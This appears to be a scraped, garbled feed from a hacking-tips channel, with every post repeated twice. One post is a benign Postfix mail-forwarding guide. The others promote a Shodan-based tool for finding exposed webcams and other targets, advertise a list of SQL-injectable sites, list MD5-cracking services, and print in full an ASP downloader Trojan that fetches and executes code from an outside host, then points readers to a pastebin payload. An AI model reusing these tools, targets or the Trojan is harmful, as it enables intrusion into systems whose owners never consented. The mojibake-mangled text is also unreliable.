β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Postfix mail forwarding
Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.
1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:
$ rpm -qa | grep postfix
2) Otherwise, you will install postfix using the following command:
$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:
$ sudo service postfix status
The following output should display on your system.
3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:
$ sudo netstat -ltnp | grep 25
4) Configuration for postfix email forwarding
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.
$ postconf | grep config_directory
5) Now, we have an idea that all postfix configuration files located in the directory /etc/postfix, so move inside the directory and edit the βmain.cfβ configuration file.
Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.
$ vi /etc/postfix/main.cf
6) Now, you need to add the following lines at the end of the βmain.cfβ file.
virtual_alias_domains = mydomain.com theanotherdomain.com
virtual_alias_maps = hash:/etc/postfix/virtual
7) Reload the postfix
After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:
$ sudo /etc/init.d/postfix reload
# or
$ sudo service postfix reload
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Postfix mail forwarding
Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.
1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:
$ rpm -qa | grep postfix
2) Otherwise, you will install postfix using the following command:
$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:
$ sudo service postfix status
The following output should display on your system.
3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:
$ sudo netstat -ltnp | grep 25
4) Configuration for postfix email forwarding
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.
$ postconf | grep config_directory
5) Now, we have an idea that all postfix configuration files located in the directory /etc/postfix, so move inside the directory and edit the βmain.cfβ configuration file.
Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.
$ vi /etc/postfix/main.cf
6) Now, you need to add the following lines at the end of the βmain.cfβ file.
virtual_alias_domains = mydomain.com theanotherdomain.com
virtual_alias_maps = hash:/etc/postfix/virtual
7) Reload the postfix
After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:
$ sudo /etc/init.d/postfix reload
# or
$ sudo service postfix reload
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Blind Attacking Framework :
F E A T U R E S :
- blind attacking makes every vulnerable & exposed host to the internet a targeted one , hence increases the awareness of potential threats
- the best way to prevent knowlege abuse under the hood is sharing it with everyone
- it will always add new to the community and will never be a replica
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade
2) install [ requests , httplib , urllib , time , bs4 "BeautifulSoup" , colored , selenium , sys ] python modules
python BAF_0.1.0.py
3) use BAF authentication to atomatically authenticate with shodan via premium account to get access to all search results or enter your shodan's account username and pass for custom account login
4) choose 1 , let it do it's job , press y , close the previous tab , press y ,close the previous tabs ...etc till u have the vulnerable cams only
5) choose 2 , enter what do u want to search for (ie: NSA) , when it's done , refer to the targets text file , it will contain the targets ip:port
that's all
6) DON'T close a loading webpage
beta versions will make automated browser open for better understanding ,but you can close the webcam tabs freely
enjoyβ€οΈππ»
β git TOPIC
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Blind Attacking Framework :
F E A T U R E S :
- blind attacking makes every vulnerable & exposed host to the internet a targeted one , hence increases the awareness of potential threats
- the best way to prevent knowlege abuse under the hood is sharing it with everyone
- it will always add new to the community and will never be a replica
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) fire up a terminal and sudo apt-get update && apt-get upgrade && apt-get dist-upgrade
2) install [ requests , httplib , urllib , time , bs4 "BeautifulSoup" , colored , selenium , sys ] python modules
python BAF_0.1.0.py
3) use BAF authentication to atomatically authenticate with shodan via premium account to get access to all search results or enter your shodan's account username and pass for custom account login
4) choose 1 , let it do it's job , press y , close the previous tab , press y ,close the previous tabs ...etc till u have the vulnerable cams only
5) choose 2 , enter what do u want to search for (ie: NSA) , when it's done , refer to the targets text file , it will contain the targets ip:port
that's all
6) DON'T close a loading webpage
beta versions will make automated browser open for better understanding ,but you can close the webcam tabs freely
enjoyβ€οΈππ»
β git TOPIC
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
UNDERCODE COMMUNITY
List Of Vulnerable SQL Injection Sites.pdf
updated 2019-2020 list
Forwarded from UNDERCODE NEWS
LeTV sued Fan Bingbing for a dispute over a results contract and the court is due to take place on 14 September
#international
#international
Forwarded from UNDERCODE NEWS
Feature exposure for Apple iPad 2020: Highly narrow bezel and wide screen available in September #technologies #leaks
Forwarded from UNDERCODE NEWS
Apple AppStore Appeal Process officially launched, allowing developers to question decisions
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Session Hijacking Attacks :
#forbeginers
- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the userβs browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
S p e c i f i c a l l y :
1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
M E T H O D E S :
There are several different ways to compromise a session token:
1) By predicting a weak session token
2) Through session sniffing
3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
4) Through man-in-the-middle (MITM) attacks (phishing, etc.)
ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Session Hijacking Attacks :
#forbeginers
- Session hijacking attacks exploit a valid web session to gain access to a computer network or system. Session hijacking is also informally known as cookie hijacking.
- Since there are several TCP connections involved in HTTP networking, there is often a method involved in the identification of web users. Whether a particular method is suitable is determined by a session token sent by a web server to the userβs browser following successful authentication. A session ID or session token is a string of varying lengths given to a visitor upon their first visit to a site. There are many ways to incorporate a session ID; it can be worked into the URL or the header of the https request received, or stored as a cookie.
S p e c i f i c a l l y :
1) Most browser sessions and web applications are susceptible to session ID attacks, though most can be used to hijack just about any system out there.
2) Session hijacking attacks, or cookie hijacking attacks, steal or imitate a session token to gain access to a system.
M E T H O D E S :
There are several different ways to compromise a session token:
1) By predicting a weak session token
2) Through session sniffing
3) By means of client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc.)
4) Through man-in-the-middle (MITM) attacks (phishing, etc.)
ubuntu forum
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Passive vulnerability auditor :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/AeonDave/doork doork
doork works with Python version 2.6.x and 2.7.x on any platform. You have also to install
2) pip install beautifulsoup4
3) pip install requests
4) pip install Django
5)cd doork
6) python doork.py
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Passive vulnerability auditor :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/AeonDave/doork doork
doork works with Python version 2.6.x and 2.7.x on any platform. You have also to install
2) pip install beautifulsoup4
3) pip install requests
4) pip install Django
5)cd doork
6) python doork.py
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - AeonDave/doork: Passive Vulnerability Auditor
Passive Vulnerability Auditor. Contribute to AeonDave/doork development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ONLINE CRACKING :
Decrypt MD5 Hashed Strings 2020 WEBSITES :
1) md5online.org
2) md5crack.com
3) md5cracker.org
4) md5decrypt.org
5) crackstation.net
6) hashkiller.co.uk
7) reverse-hash-lookup.online-domain-tools.com
8) md5decrypt.net
9) onlinehashcrack.com
10) cmd5.org
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ONLINE CRACKING :
Decrypt MD5 Hashed Strings 2020 WEBSITES :
1) md5online.org
2) md5crack.com
3) md5cracker.org
4) md5decrypt.org
5) crackstation.net
6) hashkiller.co.uk
7) reverse-hash-lookup.online-domain-tools.com
8) md5decrypt.net
9) onlinehashcrack.com
10) cmd5.org
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WEB HACKING #METHODE :
1) This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:
<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
2) The problem can be solved by clearing this code. The results of the website Trojan cleaning experts
- The content of xmlasaquan.txt is as follows:
then insert this code :
https://pastebin.com/Xr4x50Za
enjoyβ€οΈππ»
written
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦WEB HACKING #METHODE :
1) This time the user is a downloader Trojan. The hacker inserted the following code under foot.asp in the root directory of the website through the website upload vulnerability:
<%
'by*
aming Function Gethtml(url)
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
Gethtml=ObjXMLHTTP .responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode = 3
objStream.Open
objStream.Write Gethtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
Gethtml = objStream.ReadText
objStream.Close
set objStream=Nothing
End Function
execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt"))
%>
2) The problem can be solved by clearing this code. The results of the website Trojan cleaning experts
- The content of xmlasaquan.txt is as follows:
then insert this code :
https://pastebin.com/Xr4x50Za
enjoyβ€οΈππ»
written
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Pastebin
xhack - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
